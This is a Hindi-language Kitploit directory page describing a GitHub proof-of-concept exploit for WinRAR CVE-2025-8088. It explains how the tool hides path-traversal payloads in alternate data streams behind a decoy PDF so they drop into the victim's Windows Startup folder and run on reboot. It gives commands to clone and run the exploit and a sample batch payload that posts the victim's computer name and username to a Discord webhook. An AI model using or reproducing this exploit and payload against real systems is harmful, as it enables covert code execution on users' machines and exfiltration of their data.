Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
best-CVE-2025-8088 — 7.13 से पहले के Winrar CVE शोषण, एक ही फ़ाइल पर कई ADS स्ट्रीम का उपयोग करके (कस्टम PDF कार्यान्वयन) | Kitploit
उपकरण/GitHubGitHub/pentestfunctions/best-cve-2025-8088
भेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंटबाइनरी शोषण
GitHubpentestfunctions/best-cve-2025-8088

best-CVE-2025-8088

7.13 से पहले के Winrar CVE शोषण, एक ही फ़ाइल पर कई ADS स्ट्रीम का उपयोग करके (कस्टम PDF कार्यान्वयन)

रिपॉजिटरी देखें
1131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8088 WinRAR एक्सप्लॉइट 🔓

WinRAR भेद्यता (CVE-2025-8088) के लिए एक proof-of-concept एक्सप्लॉइट, जो संस्करण 7.12 और उससे निचले संस्करणों को प्रभावित करता है। यह टूल एक दुर्भावनापूर्ण RAR संग्रह बनाता है जो पेलोड्स को पाथ ट्रैवर्सल के साथ Alternate Data Streams (ADS) में एम्बेड करता है, जो संभावित रूप से मनमाने कोड निष्पादन की ओर ले जाता है।

  • कई अन्य एक्सप्लॉइट्स के साथ समस्या यह है कि वे एकाधिक ADS स्ट्रीम एम्बेड नहीं करते, जिसके लिए या तो सही पाथ ट्रैवर्सल मिलने का संयोग चाहिए या फिर सटीक उपयोगकर्ता नाम/निष्कर्षण निर्देशिका का पता होना चाहिए।

🚀 यह कैसे काम करता है

  1. डिकॉय दस्तावेज़ बनाता है 📄 - पेशेवर दिखने वाला PDF (CV या पेंटेस्ट रिपोर्ट) बनाता है
  2. एकाधिक ADS स्ट्रीम एम्बेड करता है 🔄 - विभिन्न पाथ ट्रैवर्सल गहराई के साथ पेलोड स्ट्रीम संलग्न करता है
  3. RAR हेडर्स में हेरफेर करता है ⚙️ - पाथ ट्रैवर्सल भेद्यता का शोषण करने के लिए संग्रह संरचना को संशोधित करता है
  4. पेलोड को स्टार्टअप में ड्रॉप करता है 📂 - निकाले जाने पर Windows स्टार्टअप फ़ोल्डर में पेलोड लिखने का प्रयास करता है

🛠️ उपयोग

root@kitploit:~
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ पेलोड अनुकूलन

Discord वेबहुक को कॉल करने के लिए पेलोड संपादित करें:

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

YOUR_DISCORD_WEBHOOK_URL को अपने वास्तविक वेबहुक URL से बदलें।

🔄 निष्पादन प्रवाह

  1. पीड़ित भेद्य WinRAR (≤7.12) के साथ RAR निकालता है
  2. पेलोड स्टार्टअप फ़ोल्डर में लिख दिया जाता है:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. अगले रीबूट पर ➡️ पेलोड स्वचालित रूप से निष्पादित होता है

📋 आवश्यकताएँ

  • Windows OS 🪟
  • Python 3.x 🐍
  • WinRAR इंस्टॉल हो
  • ReportLab लाइब्रेरी (pip install reportlab)
टूल डाउनलोड करें